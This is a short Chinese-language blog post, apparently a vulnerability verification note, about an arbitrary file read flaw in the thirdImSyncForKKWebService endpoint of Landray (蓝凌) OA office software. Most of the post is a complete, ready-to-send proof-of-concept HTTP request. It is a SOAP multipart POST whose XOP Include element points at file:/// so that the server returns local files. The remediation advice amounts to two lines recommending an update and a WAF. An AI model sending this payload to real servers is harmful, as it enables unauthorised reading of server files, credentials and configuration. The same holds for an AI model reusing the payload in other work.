漏洞验证-蓝凌OA thirdimsyncforkkwebservice 任意文件读取漏洞

一、漏洞描述

蓝凌OA是一款办公自动化软件,其thirdimsyncforkkwebservice存在任意文件读取漏洞,攻击者可以通过发送恶意请求读取服务器上的任意文件。

二、漏洞POC

POST /sys/webservice/thirdImSyncForKKWebService HTTP/1.1

Host: XXXX

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; rv 11.0) like Gecko

Cookie: JSESSIONID=C58F111F1E2F2C1AF183ADBE58E4C300

Accept: */*

Accept-Encoding: gzip,deflate

Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3

Content-Type: multipart/related; boundary=----31b671954508b117a126

SOAPAction: ""

Content-Length: 546

 

------31b671954508b117a126

Content-Disposition: form-data; name="a"

 

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://webservice.kk.im.third.kmss.landray.com/">

<soapenv:Header/>

<soapenv:Body>

<web:getTodo>

<arg0>

<otherCond>1</otherCond>

<pageNo>1</pageNo>

<rowSize>1</rowSize>

<targets>1</targets>

<type><xop:Include xmlns:xop="http://www.w3.org/2004/08/xop/include" href="file:///"/></type>

</arg0>

</web:getTodo>

</soapenv:Body>

</soapenv:Envelope>

------31b671954508b117a126--

三、漏洞验证

四、整改建议

1.建议用户更新到最新版本,以避免受到此漏洞的影响。2.使用WAF等安全设备对系统进行防护。

posted @ 2025-03-03 15:39  Domren  阅读(721)  评论(0)    收藏  举报